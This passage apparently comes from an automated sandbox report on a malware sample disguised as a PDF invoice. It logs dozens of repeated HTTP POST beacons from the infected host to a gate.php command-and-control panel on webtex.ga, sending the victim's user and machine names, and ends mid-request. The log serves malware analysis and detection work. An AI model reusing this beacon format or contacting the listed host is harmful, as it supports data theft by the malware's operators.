                                    Date: Thu, 03 Dec 2020 07:06:21 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    236192.168.2.34997947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:04.413716078 CET4823OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:04.430408955 CET4824OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:04.476197004 CET4824INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:21 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    237192.168.2.34998047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:04.697741985 CET4825OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:04.714380026 CET4825OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:04.758395910 CET4825INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:22 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    238192.168.2.34998147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:04.963596106 CET4826OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:04.980304956 CET4826OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:05.025183916 CET4827INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:22 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    239192.168.2.34998247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:05.247695923 CET4827OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:05.264355898 CET4828OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:05.306277037 CET4828INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:22 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    24192.168.2.34973547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:39.538012981 CET110OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:39.554655075 CET110OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:39.596359015 CET111INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:56 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    240192.168.2.34998347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:05.532497883 CET4829OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:05.549261093 CET4829OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:05.593427896 CET4829INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:22 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    241192.168.2.34998447.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:05.820292950 CET4830OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:05.837169886 CET4830OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:05.895039082 CET4831INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:23 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    242192.168.2.34998547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:06.123172998 CET4832OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:06.139894962 CET4832OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:06.183387995 CET4832INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:23 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    243192.168.2.34998647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:06.401191950 CET4833OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:06.417982101 CET4833OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:06.462903023 CET4834INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:23 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    244192.168.2.34998747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:06.688484907 CET4834OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:06.705252886 CET4835OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:06.751386881 CET4835INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:23 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    245192.168.2.34998847.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:07.003231049 CET4836OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:07.020004034 CET4836OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:07.064445972 CET4836INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:24 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    246192.168.2.34998947.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:07.279062033 CET4837OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:07.295811892 CET4837OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:07.338927031 CET4838INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:24 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    247192.168.2.34999047.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:07.573982000 CET4838OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:07.590528011 CET4839OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:07.634059906 CET4839INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:24 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    248192.168.2.34999147.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:07.858334064 CET4840OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:07.874901056 CET4840OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:08.050302982 CET4840INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:25 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    249192.168.2.34999247.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:08.266673088 CET4841OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:08.283179045 CET4841OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:08.326611996 CET4842INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:25 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    25192.168.2.34973647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:02:39.856527090 CET114OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:02:39.873260021 CET114OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:02:39.914695024 CET114INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:04:57 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    250192.168.2.34999347.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:08.547826052 CET4844OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:08.564414978 CET4844OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:08.606347084 CET4844INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:25 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    251192.168.2.34999547.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:08.827517986 CET4846OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:08.844466925 CET4846OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:08.888386965 CET4846INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:26 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    252192.168.2.34999647.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:09.106498003 CET4854OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                    Host: webtex.ga
                                    Accept: */*
                                    Content-Type: application/octet-stream
                                    Content-Encoding: binary
                                    Content-Key: 31904CD2
                                    Content-Length: 163
                                    Connection: close
                                    Dec 3, 2020 10:04:09.123363018 CET4854OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 68 00 61 00 72 00 64 00 7a 00 01 00 0c 00 00 00 34 00 33 00 36 00 34 00 33 00 32 00 01 00 1e 00 00 00 44 00 45 00 53 00 4b 00 54 00 4f 00 50 00 2d 00 37 00 31 00 36 00 54 00 37
                                    Data Ascii: (ckav.ruhardz436432DESKTOP-716T77108F9C4E9C79A3B52B3F739430
                                    Dec 3, 2020 10:04:09.171283960 CET4855INHTTP/1.0 404 Not Found
                                    Date: Thu, 03 Dec 2020 07:06:26 GMT
                                    Server: Apache
                                    X-Powered-By: PHP/5.6.40
                                    Status: 404 Not Found
                                    Content-Length: 23
                                    Content-Type: text/html; charset=UTF-8
                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                    Data Ascii: File not found.


                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    253192.168.2.34999747.91.79.16380C:\Users\user\Desktop\PI_Nov9071011998_ENTRUSTpdf.exe
                                    TimestampkBytes transferredDirectionData
                                    Dec 3, 2020 10:04:09.374098063 CET4859OUTPOST /ibiki/gate.php HTTP/1.0
                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
